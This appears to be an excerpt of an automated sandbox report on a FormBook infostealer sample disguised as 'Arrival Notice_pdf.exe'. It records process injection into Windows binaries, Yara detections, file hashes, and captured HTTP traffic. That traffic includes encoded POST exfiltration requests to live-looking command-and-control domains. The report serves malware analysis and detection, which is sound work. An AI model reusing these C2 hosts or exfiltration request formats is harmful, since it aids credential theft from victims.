XRWLl=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkKnXi5fOar7cRDqvZjJ2Fqmm7YciejGQ0p+oq/V/oFDLXNftzR3JTPdMqxlzJkDyZFVj3VUv3kt0eG0wqHysVWl4jddhBT87AiIRiQf84JP2yh2jOL5UxXp3vYFZgAmLnKcUXC+JKcV0xCbSZsMC/5AUSVi0LafPIv7DV09+LWYigl1WCIiARBvehYuZHzWISjj2vqtD9ixWIU24itU2Lm6k1tAsqoazMUZtVou4vFeBrwGtoTE3sxBdudEs9yfAPHymB5RUndHBHOi5/PGLrXkbg+uIVlnREjnUd90t7SocgxdmqW/Sw/rowS8lnd+/G6ZuyKFIRYuvCzH7ydVs8FsThnr+1BIPfwcumU3bnVl7JRgRLUT2EuuR3m4SR9HIGkUP6dWGYxn7W8N7Q7YneYOZ/37+8fwOjOubaIdCKz+yaSY1eL4FpVM/tRyi9gwXa4stEZEixrAfW+YPn7IMsceEcHrHVWJAk/Y5zc0/QGZH0apLxh8eVnVpxKE9NrRd9M/aDereMII0+rh3kvgh2ujvjPryKjtCJrae+yskyoBnQdiyQU6REkebAzCz2RA/MR1Y1XBjDmsloXZmR9dpXSTebopdlEryiCiWojE/5okAL5zdoYX2mDGTJvucjTZKb/Jvd5TWX4dLSBWhudGkQRraretqX5m143PVEPULQVa7JRj6vjdkJ2jtvtPZ6+weVcHIIpj9Os5JPRZHnQbOpvHPHEhT5h4337gCgkMWBbLBLpjQOgi2LX8eroZhrlbspEHRUirE4emdlD1yvlYc+R5IpK3yoAI1dEQiO0oen2XfY8InvqmWWvxqXoWwVIwdrQ5Ev/rDIXPbC+BvLX6NeQEIs+tQQ+dcEBzQ/+uDP57ZnY69+D5ylfPNPoxSWDxtj7DDKXl7tIzpYkgBbG2E1k87zYqPcbZ32OpW2GIUhMlUxMHLIBj6EKZFbgKKrsPrL/RblU [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50018	3.33.130.190	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:24:02.961467028 CET	532	OUT	GET /0598/?XRWLl=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&p2J=sbJxX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.mcfunding.org Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 18, 2024 03:24:03.582122087 CET	391	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 18 Nov 2024 02:24:03 GMT Content-Type: text/html Content-Length: 251 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 52 57 4c 6c 3d 74 36 38 42 4e 30 39 69 56 65 71 62 2f 49 75 4d 59 46 6f 67 38 4b 47 63 44 51 69 45 52 36 43 46 49 6f 6f 63 48 51 73 33 6c 6f 7a 71 67 36 50 69 45 34 69 72 5a 42 2b 64 56 6b 52 63 4e 4b 6e 33 71 71 59 54 66 7a 2b 55 32 4b 4b 73 6b 64 52 73 76 47 76 34 64 4f 57 57 69 54 79 4d 58 76 46 38 6b 79 78 31 4b 45 4f 65 51 58 63 2f 79 56 68 58 78 6e 45 72 63 32 4d 3d 26 70 32 4a 3d 73 62 4a 78 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?XRWLl=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&p2J=sbJxX"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50019	198.252.98.54	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:24:08.666491032 CET	816	OUT	POST /y3dc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.migorengya8.click Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 202 Cache-Control: no-cache Origin: http://www.migorengya8.click Referer: http://www.migorengya8.click/y3dc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 69 77 4d 7a 34 58 74 7a 71 46 51 54 68 36 69 76 77 6b 4a 38 68 4b 46 36 30 33 42 51 33 6e 4b 4b 2b 4d 6f 70 38 55 42 71 4f 70 70 63 66 33 76 70 61 47 72 52 4e 31 6e 63 69 44 38 6b 53 46 39 39 63 4d 62 42 2b 4d 70 4d 66 54 6a 70 79 2b 35 6d 36 52 6f 78 41 76 38 71 6e 44 6a 47 61 34 78 68 48 51 71 51 32 65 35 42 62 49 39 38 30 30 49 52 51 37 30 69 31 49 50 4d 2f 4a 66 32 45 35 4b 63 4d 75 73 49 68 52 4d 32 56 56 62 4d 4b 70 51 71 65 53 37 43 4e 4c 50 47 72 42 58 45 6d 57 42 4d 59 64 38 31 44 62 47 2f 57 7a 6d 67 6c 48 46 34 41 61 46 54 32 77 3d 3d Data Ascii: XRWLl=vjjmaXWtymtuiwMz4XtzqFQTh6ivwkJ8hKF603BQ3nKK+Mop8UBqOppcf3vpaGrRN1nciD8kSF99cMbB+MpMfTjpy+5m6RoxAv8qnDjGa4xhHQqQ2e5BbI9800IRQ70i1IPM/Jf2E5KcMusIhRM2VVbMKpQqeS7CNLPGrBXEmWBMYd81DbG/WzmglHF4AaFT2w==
Nov 18, 2024 03:24:09.313282013 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Mon, 18 Nov 2024 02:24:09 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50020	198.252.98.54	80	4040	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:24:11.212625980 CET	836	OUT	POST /y3dc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.migorengya8.click Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 222 Cache-Control: no-cache Origin: http://www.migorengya8.click Referer: http://www.migorengya8.click/y3dc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 6a 54 55 7a 72 6b 56 7a 73 6c 51 63 75 61 69 76 35 45 4a 34 68 4b 42 36 30 32 46 35 33 52 69 4b 39 74 59 70 75 46 42 71 65 35 70 63 4b 48 75 6a 56 6d 72 67 4e 31 71 6a 69 44 41 6b 53 46 70 39 63 4e 72 42 2b 2f 42 50 66 44 6a 72 2b 65 35 67 30 78 6f 78 41 76 38 71 6e 44 33 6f 61 34 35 68 48 67 61 51 6b 50 35 4f 57 6f 39 2f 6b 45 49 52 44 72 30 6d 31 49 4f 6a 2f 49 43 6a 45 2f 47 63 4d 72 41 49 69 44 30 70 63 56 62 4b 4f 70 52 72 52 78 4b 30 4c 71 6d 4d 70 44 57 67 37 48 74 38 51 37 78 76 53 71 6e 6f 45 7a 43 54 34 41 4d 4d 4e 5a 34 61 74 38 30 6f 39 79 78 44 65 43 42 50 39 77 70 61 71 36 35 76 65 63 45 3d Data Ascii: XRWLl=vjjmaXWtymtujTUzrkVzslQcuaiv5EJ4hKB602F53RiK9tYpuFBqe5pcKHujVmrgN1qjiDAkSFp9cNrB+/BPfDjr+e5g0xoxAv8qnD3oa45hHgaQkP5OWo9/kEIRDr0m1IOj/ICjE/GcMrAIiD0pcVbKOpRrRxK0LqmMpDWg7Ht8Q7xvSqnoEzCT4AMMNZ4at80o9yxDeCBP9wpaq65vecE=
Nov 18, 2024 03:24:11.851063013 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Mon, 18 Nov 2024 02:24:11 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	50021	198.252.98.54	80

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:24:14.210599899 CET	10918	OUT	POST /y3dc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.migorengya8.click Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Cache-Control: no-cache Origin: http://www.migorengya8.click Referer: http://www.migorengya8.click/y3dc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 58 52 57 4c 6c 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 6a 54 55 7a 72 6b 56 7a 73 6c 51 63 75 61 69 76 35 45 4a 34 68 4b 42 36 30 32 46 35 33 52 61 4b 2b 65 41 70 38 79 39 71 64 35 70 63 57 58 75 67 56 6d 72 39 4e 31 79 76 69 44 4d 65 53 48 52 39 63 76 6a 42 33 75 42 50 4d 6a 6a 72 6a 4f 35 68 36 52 6f 42 41 76 73 75 6e 44 6e 6f 61 34 35 68 48 69 43 51 6e 65 35 4f 46 34 39 38 30 30 49 56 51 37 30 65 31 49 6d 5a 2f 49 47 7a 48 50 6d 63 4d 4b 73 49 75 57 59 70 45 46 62 49 4a 70 51 34 52 78 47 6e 4c 71 36 75 70 43 7a 46 37 45 78 38 56 75 49 75 41 50 48 53 61 77 36 65 37 67 34 4c 45 4c 6b 4c 74 66 6f 7a 74 48 73 66 64 44 31 63 2f 68 41 74 36 37 6f 70 64 62 78 44 53 50 63 79 76 74 58 43 7a 36 7a 4c 76 47 7a 69 72 6e 36 6d 63 7a 49 70 6e 59 5a 70 31 68 34 48 48 50 57 30 49 4d 30 30 46 59 36 68 6f 4c 55 6c 6b 4f 71 6d 62 31 48 51 51 68 62 43 61 38 53 45 69 77 45 2f 55 6c 70 46 63 2f 59 79 58 4c 45 6b 41 67 6e 6f 36 62 47 4a 4e 57 7a 6f 79 38 6e 6c 74 7a 49 4a 49 4f 4d 6d 4e 2b 41 6d 72 66 49 53 63 62 48 4e [TRUNCATED] Data Ascii: XRWLl=vjjmaXWtymtujTUzrkVzslQcuaiv5EJ4hKB602F53RaK+eAp8y9qd5pcWXugVmr9N1yviDMeSHR9cvjB3uBPMjjrjO5h6RoBAvsunDnoa45hHiCQne5OF49800IVQ70e1ImZ/IGzHPmcMKsIuWYpEFbIJpQ4RxGnLq6upCzF7Ex8VuIuAPHSaw6e7g4LELkLtfoztHsfdD1c/hAt67opdbxDSPcyvtXCz6zLvGzirn6mczIpnYZp1h4HHPW0IM00FY6hoLUlkOqmb1HQQhbCa8SEiwE/UlpFc/YyXLEkAgno6bGJNWzoy8nltzIJIOMmN+AmrfIScbHNj1SsSu8/DV3LokIKxyXYM0pAhn19yipfkNMG76EygWJyXGs69QDNOCJv5C5Td1hUAIUyPOD3+Tiizb/wzxYh7t89iq9AyWRKRIDTXxWPZ3tI1uKgPeM7wF4JZwURnfHknItAaLs/v2sIOgB3/Xtooj1AUVI3muo4JzCDsAbuM5xN5Uqji02VYAQyMzPblNHXOlyBSkFFWTr2BL5Q+H7mmoOnogJmR3pRivoOSE+QCIq4ApOxLeKFmL+WCm6rehfpDCyfUPoKvd4JA7O+Qt/1jmy7lTqYcN4yqHp65RwAbkwaUnbexE3kJK3XDxDrYmrb4D5vbyoQ8I6u9lJcfNGPbZv/iFZ64QxN9ofMTR1UDx0rDAj2K02swPYkqw6xs2H4igdkhFouUHal29vvNI5V7lOv0sXhqe2z0Pa+qHWThdUpcLXGNYHTWNdGhzMm5i5p6QvlWSvnAl4SrzJ3MaWM3noLw0CElMvKjofH61JAth36doCCG8szZ4Io7/BIDO96E+f8qTTehwQXISjRRHGXd4jO8Jk8AxhbLaRgUI+i0U31d4iPfnOGRFjKSl0q+uYAPn4CFSytQommTSRNrZJR3tUeAcimJD9Q843sYbIO+pwXdIdztjxSlT37a6/JhjeQXVhbPACBJPEcUMl09zyOwsEsHaNFfG4HO2 [TRUNCATED]
Nov 18, 2024 03:24:14.860213041 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Mon, 18 Nov 2024 02:24:14 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	50022	198.252.98.54	80

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 03:24:16.755650997 CET	536	OUT	GET /y3dc/?XRWLl=ihLGZn7rk3oJmiIz33Bz1E4xhZDY72dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERgPwyb4b9y8rXeUu2h/5aaRRGXSXrvcfb4U=&p2J=sbJxX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.migorengya8.click Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 18, 2024 03:24:17.397373915 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Mon, 18 Nov 2024 02:24:17 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Target ID:	0
Start time:	21:22:07
Start date:	17/11/2024
Path:	C:\Users\user\Desktop\Arrival Notice_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Arrival Notice_pdf.exe"
Imagebase:	0x240000
File size:	1'223'168 bytes
MD5 hash:	1FF21E9055F0E4E51B6061ABBDB371C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:22:08
Start date:	17/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Arrival Notice_pdf.exe"
Imagebase:	0xa70000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2109435609.00000000039B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2109156869.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2109766893.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:22:34
Start date:	17/11/2024
Path:	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe"
Imagebase:	0x4f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3007851099.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	21:22:36
Start date:	17/11/2024
Path:	C:\Windows\SysWOW64\srdelayed.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\srdelayed.exe"
Imagebase:	0xd90000
File size:	16'384 bytes
MD5 hash:	B5F31FDCE1BE4171124B9749F9D2C600
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	21:22:36
Start date:	17/11/2024
Path:	C:\Windows\SysWOW64\ktmutil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\ktmutil.exe"
Imagebase:	0x720000
File size:	15'360 bytes
MD5 hash:	AC387D5962B2FE2BF4D518DD57BA7230
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3007895884.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3007811808.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3006361628.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	21:22:50
Start date:	17/11/2024
Path:	C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe"
Imagebase:	0x4f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3009849528.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	21:23:04
Start date:	17/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4%
